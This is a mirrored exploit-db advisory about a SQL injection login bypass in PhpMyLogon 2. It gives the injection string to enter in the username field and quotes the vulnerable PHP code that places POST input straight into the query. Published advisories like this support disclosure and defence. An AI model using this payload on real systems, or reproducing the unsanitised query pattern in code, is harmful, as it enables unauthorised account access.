bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/11737.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
771 B
Text
Raw Blame History

# Exploit Title: PhpMyLogon SQL Injection
# Date: March 14, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download
# Version: 2
# Tested on: Windows XP SP3
Proof of Concept:
Enter the following for the username to login as the first user:
blake' or '1'='1' #
and anything for the password.
Vulnerable Code:
if(isset($_POST['submit'])) {
if($_POST['username'] != "" AND $_POST['password'] != "") {
// Check submitted data with data in database
$sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM `".$settings['db_table']."` WHERE username = '".$_POST['username']."' LIMIT 1";
$query = mysql_query($sql);
Reference in a new issue View git blame Copy permalink